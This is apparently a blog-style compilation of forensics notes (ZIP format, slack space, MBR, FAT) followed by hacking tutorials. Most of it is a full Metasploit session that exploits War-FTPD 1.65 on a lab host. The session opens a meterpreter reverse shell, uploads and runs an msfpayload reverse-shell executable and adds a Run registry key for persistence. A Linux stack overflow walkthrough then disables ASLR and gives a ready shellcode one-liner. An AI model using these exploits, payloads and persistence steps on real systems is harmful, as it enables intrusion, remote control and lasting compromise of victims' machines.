ZIP File Strukture

Zip is a file format used for data compression and archiving. A zip file contains one or more files that have been compressed, to reduce file size, or stored as is. The zip file format permits a number of compression algorithms.

The format was originally created in 1989 by Phil Katz, and was first implemented in PKWARE's PKZIP utility,as a replacement for the previous ARC compression format by Thom Henderson.

The zip format is now supported by many software utilities other than PKZIP. Microsoft has included built-in zip support (under the name "compressed folders") in versions of Microsoft Windows since 1998. Apple has included built-in zip support in Mac OS X 10.3 (via BOMArchiveHelper, now Archive Utility) and later, along with other compression formats.

Zip files generally use the file extensions ".zip" or ".ZIP" and the MIME media type application/zip.Zip is used as a base file format by many programs, usually under a different name.

Zip files are often represented by a document or other object prominently featuring a zipper.

Magic Number

Magic numbers are common in programs across many operating systems. Magic numbers implement strongly typed data and are a form of in-band signaling to the controlling program that reads the data type(s) at program run-time. Many files have such constants that identify the contained data. Detecting such constants in files is a simple and effective way of distinguishing between many file formats and can yield further run-time information.

Unallocated Space

Unallocated Space is available disk space that is not allocated to any volume. The type of volume that you can create on unallocated space depends on the disk type. On basic disks, you can use unallocated space to create primary or extended partitions. On dynamic disks, you can use unallocated space to create dynamic volumes.

Unallocated space is simply defined as the area or space on the hard drive of the computer that is available to write data to.  

Slack Space

Slack space or sometimes referred to as file slack is the area between the end of a fileand end of the last cluster or sector used by the file in question. Area is an area that will not be used again to store the information there, so the area is "wasted" useless. Slackspace is common in file systems that use a large cluster size, while the file system that uses a small cluster size can organize the storage media more effectively and efficiently.Amount of wasted disk space can be thought is estimated by multiplying the number offiles (including the number of directories) with half the size of a cluster. For example, a 10 000 personal computer that stores files in a file system that uses a cluster size of 4kilobytes will have approximately 10 000 x 2 MB ~ = 20000 KB. On a large file server,slack space and even reached the size of tens of gigabytes.

MBR (Master Boot Record)

What is the MBR?
At the end of the ROM BIOS bootstrap routine, the BIOS reads and executes the first physical sector of the first floppy or hard disk on the system. This first sector of the hard disk is called the master boot record (or sometimes the partition table or master boot block). There is a small program at the beginning of this sector of the hard disk. The partition information, or partition table, is stored at the end of this sector. This program uses the partition information to determine which partition is bootable (usually the first primary DOS partition) and attempts to boot from it. 

Structure File System

• FAT16

FAT16 is a file system that uses the allocation unit that has a limit of up to 16-bit, so it can store up to 216 units of allocation (65536 pieces). This file system has a capacity limit of up to 4 Gigabyte sizes only. Allocation unit size used by the FAT16 partitiondepends on the capacity that was about to be formatted: if the partition size is less than 16 megabytes, then Windows will use the FAT12 file system, and if the partition sizelarger than 16 megabytes, then Windows will use the FAT16 file system. The following table contains information any operating system that supports the FAT16 file system.

• FAT32

FAT32 uses allocation unit size is smaller than the file system FAT12/FAT16, so FAT32is more efficient when applied on a large partition (size greater than 512 Megabytes).The savings made ​​by comparison with FAT16/FAT12 FAT32 is approximately 20% to 27%. Windows 98 has a utility that can be used to convert the FAT16 partition to FAT32without losing data.

FAT32 is a derivative of the File Allocation Table (FAT) file system that supports drives with over 2GB of storage. Because FAT32 drives can contain more than 65,526 clusters, smaller clusters are used than on large FAT16 drives. This method results in more efficient space allocation on the FAT32 drive.
The largest possible file for a FAT32 drive is 4GB minus 2 bytes.
The FAT32 file system includes four bytes per cluster within the file allocation table. Note that the high 4 bits of the 32-bit values in the FAT32 file allocation table are reserved and are not part of the cluster number.

DVWA Medium Security Exploitation Linux

Damn Vulnerable Web Application (DVWA) hacking tool is a collection of web-basedPHP / mySQL. DVWA may be an option for beginners to learn web hacking web hackingtechniques from scratch. Various web hacking attack technique can be obtained fromthis tool, DVWA run through the local server (localhost)
but before we go DVWA we must first activate apache and mysql
after then we go DVWA activated as shown below,  and to enter our username andpassword

Update Beef And Metasploit

Open your beef in App-Exploitation Tool-social Engenering Tool-BEEF XSS framework-BeEF_ng, It will exit the console as picure below

Attack Vector Exploit And Browse

open your beef

Auxilary Moduls Using Msf

this module will platform SNMP sweeps against the given range of network  address using a well known set of snmp_login string and print the discovered SNMP device information on the screen

root@bt:~# msfconsole 

Social Engineering And Toolkit

Social engineering is also known as a hack man, is an act of social engineering tomanipulate the human mind wants to get a goal. Social engineering is a common term oneveryone's daily life and apply it but the use of social engineering in penetration testing andhacking a bit different. The main use of social engineering in the hacking is to getinformation, to maintain access and so on.

There are a variety of social engineering tips and tricks available on the Internet in additionthere are tips on social engineering toolkit is available to carry out computer-based socialengineering attacks....

Msfencode And Msfpayload

Msfencode
Msfpayload shellcode produced by a fully functional, but it contains some null charactersthat, when interpreted by many programs, signaling the end of the string, and this willcause the code to terminate before completion. In other words.

root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > sexy.exe 
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
picure is below

Msfpaylaods
Msfpayload is a component of Metasploit to generate shellcode, executable, for use inthe exploitation outside of the Framework. Shellcode can be generated in many formats, including C, Ruby, JavaScript, and even Visual Basic for Applications. Each outputformat would be useful in various situations.


example

root@bt:~# msfconsole 

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|`.""'.
  II     6.     .P  :  .' / |  `.  :
  II     'T;. .;P'  '.'  /  |    `.'
  II      'T; ;P'    `. /   |    .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14551 updated 14 days ago (2012.01.14)

Warning: This copy of the Metasploit Framework was last updated 14 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf > use exploit/windows/ftp/warftpd_165_user

msf exploit(warftpd_165_user) > search warftp

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/windows/ftp/warftpd_165_pass 1998-03-19 average War-FTPD 1.65 Password Overflow

exploit/windows/ftp/warftpd_165_user 1998-03-19 average War-FTPD 1.65 Username Overflow

msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description

---- --------------- -------- -----------

FTPPASS mozilla@example.com no The password for the specified username

FTPUSER anonymous no The username to authenticate as

RHOST yes The target address

RPORT 21 yes The target port

msf exploit(warftpd_165_user) > set RHOST 192.168.56.101

RHOST => 192.168.56.101

msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description

---- --------------- -------- -----------

FTPPASS mozilla@example.com no The password for the specified username

FTPUSER anonymous no The username to authenticate as

RHOST 192.168.56.101 yes The target address

RPORT 21 yes The target port

msf exploit(warftpd_165_user) > show payloads

Compatible Payloads

===================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

generic/custom normal Custom Payload

generic/debug_trap normal Generic x86 Debug Trap

generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline

generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline

generic/tight_loop normal Generic x86 Tight Loop

windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)

windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)

windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager

windows/dllinject/reverse_http normal Reflective Dll Injection, Reverse HTTP Stager

windows/dllinject/reverse_ipv6_http normal Reflective Dll Injection, Reverse HTTP Stager (IPv6)

windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)

windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)

windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)

windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager

windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager

windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)

windows/download_exec normal Windows Executable Download and Execute

windows/exec normal Windows Execute Command

windows/loadlibrary normal Windows LoadLibrary Path

windows/messagebox normal Windows MessageBox

windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)

windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)

windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager

windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager

windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager

windows/meterpreter/reverse_ipv6_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)

windows/meterpreter/reverse_ipv6_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)

windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)

windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)

windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)

windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager

windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager

windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)

windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP

windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline

windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)

windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)

windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager

windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)

windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)

windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)

windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager

windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager

windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)

windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)

windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)

windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager

windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)

windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)

windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)

windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager

windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager

windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)

windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)

windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)

windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager

windows/shell/reverse_http normal Windows Command Shell, Reverse HTTP Stager

windows/shell/reverse_ipv6_http normal Windows Command Shell, Reverse HTTP Stager (IPv6)

windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)

windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)

windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)

windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager

windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager

windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)

windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline

windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline

windows/speak_pwned normal Windows Speech API - Say "You Got Pwned!"

windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)

windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)

windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager

windows/upexec/reverse_http normal Windows Upload/Execute, Reverse HTTP Stager

windows/upexec/reverse_ipv6_http normal Windows Upload/Execute, Reverse HTTP Stager (IPv6)

windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)

windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)

windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)

windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager

windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager

windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)

windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)

windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)

windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager

windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Reverse HTTP Stager

windows/vncinject/reverse_ipv6_http normal VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)

windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)

windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)

windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)

windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager

windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager

windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)

msf exploit(warftpd_165_user) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description

---- --------------- -------- -----------

FTPPASS mozilla@example.com no The password for the specified username

FTPUSER anonymous no The username to authenticate as

RHOST 192.168.56.101 yes The target address

RPORT 21 yes The target port

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process, none

LHOST yes The listen address

LPORT 4444 yes The listen port

msf exploit(warftpd_165_user) > set LHOST 192.168.56.1

LHOST => 192.168.56.1

msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description

---- --------------- -------- -----------

FTPPASS mozilla@example.com no The password for the specified username

FTPUSER anonymous no The username to authenticate as

RHOST 192.168.56.101 yes The target address

RPORT 21 yes The target port

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process, none

LHOST 192.168.56.1 yes The listen address

LPORT 4444 yes The listen port

msf exploit(warftpd_165_user) > show targets

Exploit targets:

Id Name

-- ----

0 Windows 2000 SP0-SP4 English

1 Windows XP SP0-SP1 English

2 Windows XP SP2 English

3 Windows XP SP3 English

msf exploit(warftpd_165_user) > set targets 3

targets => 3

msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description

---- --------------- -------- -----------

FTPPASS mozilla@example.com no The password for the specified username

FTPUSER anonymous no The username to authenticate as

RHOST 192.168.56.101 yes The target address

RPORT 21 yes The target port

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process, none

LHOST 192.168.56.1 yes The listen address

LPORT 4444 yes The listen port

msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description

---- --------------- -------- -----------

FTPPASS mozilla@example.com no The password for the specified username

FTPUSER anonymous no The username to authenticate as

RHOST 192.168.56.101 yes The target address

RPORT 21 yes The target port

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process, none

LHOST 192.168.56.1 yes The listen address

LPORT 4444 yes The listen port

msf exploit(warftpd_165_user) > exploit

[-] Exploit failed: A target has not been selected.

msf exploit(warftpd_165_user) > set target 3

target => 3

msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description

---- --------------- -------- -----------

FTPPASS mozilla@example.com no The password for the specified username

FTPUSER anonymous no The username to authenticate as

RHOST 192.168.56.101 yes The target address

RPORT 21 yes The target port

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process, none

LHOST 192.168.56.1 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

3 Windows XP SP3 English

msf exploit(warftpd_165_user) > exploit

[*] Started reverse handler on 192.168.56.1:4444

[-] Exploit exception: The connection was refused by the remote host (192.168.56.101:21).

[*] Exploit completed, but no session was created.

msf exploit(warftpd_165_user) > exploit

[*] Started reverse handler on 192.168.56.1:4444

[*] Trying target Windows XP SP3 English...

[*] Sending stage (752128 bytes) to 192.168.56.101

[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1050) at 2012-02-27 20:27:04 +0700

meterpreter > ps

Process list

============

PID Name Arch Session User Path

--- ---- ---- ------- ---- ----

0 [System Process]

1040 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

1104 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe

1156 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe

1496 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe

1600 svchost.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\svchost.exe

1660 explorer.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\Explorer.EXE

1712 alg.exe x86 0 C:\WINDOWS\System32\alg.exe

1808 VBoxTray.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\VBoxTray.exe

1816 GrooveMonitor.exe x86 0 WEKO-9B92FC1EF0\weko C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe

1828 ctfmon.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\ctfmon.exe

1984 svchost.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\svchost.exe

2136 wscntfy.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\wscntfy.exe

3120 wuauclt.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\wuauclt.exe

3464 wpabaln.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\wpabaln.exe

4 System x86 0

4064 war-ftpd.exe x86 0 WEKO-9B92FC1EF0\weko C:\Documents and Settings\weko\My Documents\instaler\war-ftpd.exe

444 AntDS.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\BigAntSoft\AntServer\AntDS.exe

464 AntServer.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\BigAntSoft\AntServer\AntServer.exe

488 AvServer.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\BigAntSoft\AntServer\AvServer.exe

520 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe

584 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe

608 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe

660 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe

672 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe

828 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe

872 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe

948 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe

meterpreter > ?

Core Commands

=============

Command Description

------- -----------

? Help menu

background Backgrounds the current session

bgkill Kills a background meterpreter script

bglist Lists running background scripts

bgrun Executes a meterpreter script as a background thread

channel Displays information about active channels

close Closes a channel

detach Detach the meterpreter session (for http/https)

disable_unicode_encoding Disables encoding of unicode strings

enable_unicode_encoding Enables encoding of unicode strings

exit Terminate the meterpreter session

help Help menu

info Displays information about a Post module

interact Interacts with a channel

irb Drop into irb scripting mode

load Load one or more meterpreter extensions

migrate Migrate the server to another process

quit Terminate the meterpreter session

read Reads data from a channel

resource Run the commands stored in a file

run Executes a meterpreter script or Post module

use Deprecated alias for 'load'

write Writes data to a channel

Stdapi: File system Commands

============================

Command Description

------- -----------

cat Read the contents of a file to the screen

cd Change directory

del Delete the specified file

download Download a file or directory

edit Edit a file

getlwd Print local working directory

getwd Print working directory

lcd Change local working directory

lpwd Print local working directory

ls List files

mkdir Make directory

pwd Print working directory

rm Delete the specified file

rmdir Remove directory

search Search for files

upload Upload a file or directory

Stdapi: Networking Commands

===========================

Command Description

------- -----------

ipconfig Display interfaces

portfwd Forward a local port to a remote service

route View and modify the routing table

Stdapi: System Commands

=======================

Command Description

------- -----------

clearev Clear the event log

drop_token Relinquishes any active impersonation token.

execute Execute a command

getpid Get the current process identifier

getprivs Attempt to enable all privileges available to the current process

getuid Get the user that the server is running as

kill Terminate a process

ps List running processes

reboot Reboots the remote computer

reg Modify and interact with the remote registry

rev2self Calls RevertToSelf() on the remote machine

shell Drop into a system command shell

shutdown Shuts down the remote computer

steal_token Attempts to steal an impersonation token from the target process

sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands

===============================

Command Description

------- -----------

enumdesktops List all accessible desktops and window stations

getdesktop Get the current meterpreter desktop

idletime Returns the number of seconds the remote user has been idle

keyscan_dump Dump the keystroke buffer

keyscan_start Start capturing keystrokes

keyscan_stop Stop capturing keystrokes

screenshot Grab a screenshot of the interactive desktop

setdesktop Change the meterpreters current desktop

uictl Control some of the user interface components

Stdapi: Webcam Commands

=======================

Command Description

------- -----------

record_mic Record audio from the default microphone for X seconds

webcam_list List webcams

webcam_snap Take a snapshot from the specified webcam

Priv: Elevate Commands

======================

Command Description

------- -----------

getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

================================

Command Description

------- -----------

hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands

========================

Command Description

------- -----------

timestomp Manipulate file MACE attributes

meterpreter > help

Core Commands

=============

Command Description

------- -----------

? Help menu

background Backgrounds the current session

bgkill Kills a background meterpreter script

bglist Lists running background scripts

bgrun Executes a meterpreter script as a background thread

channel Displays information about active channels

close Closes a channel

detach Detach the meterpreter session (for http/https)

disable_unicode_encoding Disables encoding of unicode strings

enable_unicode_encoding Enables encoding of unicode strings

exit Terminate the meterpreter session

help Help menu

info Displays information about a Post module

interact Interacts with a channel

irb Drop into irb scripting mode

load Load one or more meterpreter extensions

migrate Migrate the server to another process

quit Terminate the meterpreter session

read Reads data from a channel

resource Run the commands stored in a file

run Executes a meterpreter script or Post module

use Deprecated alias for 'load'

write Writes data to a channel

Stdapi: File system Commands

============================

Command Description

------- -----------

cat Read the contents of a file to the screen

cd Change directory

del Delete the specified file

download Download a file or directory

edit Edit a file

getlwd Print local working directory

getwd Print working directory

lcd Change local working directory

lpwd Print local working directory

ls List files

mkdir Make directory

pwd Print working directory

rm Delete the specified file

rmdir Remove directory

search Search for files

upload Upload a file or directory

Stdapi: Networking Commands

===========================

Command Description

------- -----------

ipconfig Display interfaces

portfwd Forward a local port to a remote service

route View and modify the routing table

Stdapi: System Commands

=======================

Command Description

------- -----------

clearev Clear the event log

drop_token Relinquishes any active impersonation token.

execute Execute a command

getpid Get the current process identifier

getprivs Attempt to enable all privileges available to the current process

getuid Get the user that the server is running as

kill Terminate a process

ps List running processes

reboot Reboots the remote computer

reg Modify and interact with the remote registry

rev2self Calls RevertToSelf() on the remote machine

shell Drop into a system command shell

shutdown Shuts down the remote computer

steal_token Attempts to steal an impersonation token from the target process

sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands

===============================

Command Description

------- -----------

enumdesktops List all accessible desktops and window stations

getdesktop Get the current meterpreter desktop

idletime Returns the number of seconds the remote user has been idle

keyscan_dump Dump the keystroke buffer

keyscan_start Start capturing keystrokes

keyscan_stop Stop capturing keystrokes

screenshot Grab a screenshot of the interactive desktop

setdesktop Change the meterpreters current desktop

uictl Control some of the user interface components

Stdapi: Webcam Commands

=======================

Command Description

------- -----------

record_mic Record audio from the default microphone for X seconds

webcam_list List webcams

webcam_snap Take a snapshot from the specified webcam

Priv: Elevate Commands

======================

Command Description

------- -----------

getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

================================

Command Description

------- -----------

hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands

========================

Command Description

------- -----------

timestomp Manipulate file MACE attributes

meterpreter > upload /root/sexy.exe c:\\windows\\system32

[*] uploading : /root/sexy.exe -> c:\windows\system32

[*] uploaded : /root/sexy.exe -> c:\windows\system32\sexy.exe

meterpreter > execute -f sexy.exe

Process 3372 created.

meterpreter > execute -f sexy.exe

Process 2816 created.

meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\run -v start -d 'c:\\windows\

Successful set start.

meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\run -v start -d 'c:\\window

Key: HKLM\Software\Microsoft\Windows\CurrentVersion\run

Name: start

Type: REG_SZ

Data: c:\\windows\\system32\\sexy.exe

meterpreter > reboot

Rebooting...

meterpreter >  

Exploitation Linux In BT 5 r1

Exploit linux
before we start we should pray that facilitated the exploitation of linux
hehehehehe….
:)
we start from the beginning of the story of exploitation linux and go directly to the TKP!
hehehehe ...
:)

Okay we first open a terminal and run the following command

root@bt:~# cat /proc/sys/kernel/randomize_va_space
root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@bt:~# cat /proc/sys/kernel/randomize_va_space

And shown in the picture below

Then we create a file with extension C that uses the language C + + and it looks like the picture below

The next compile the script to trigger a buffer overflow

Next we use a protection technique called "stack-smashing protection" and is used to detect buffer overflow the stack before the malicious code is executed.
We can change the SSP off by adding "-fno-stack-protector" flag to gcc when compiling.
then we send a character as much as 505 but still not teroverwrite then we send as much as 508 characters we can see EIP  in it is 0x41414141 as shown in the picture below 

then we can see if the value of EBP and EIP has overwritted. Next, we examine a specific register ESP as shown below

Then we try to find out the address of the ESP and reduce the 200 bytes of it.
The next, we subtract 200 from ESP. ESP is in bffff16c address, then we will get the result: 0xbffff16c - 200 = 0xbfffef6c to calculate these values ​​we can use the application Kcalc

The next and generate shellcode.

run $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\xa4\xf0\xff\xbf" * 35')

Exploitation succes....
:)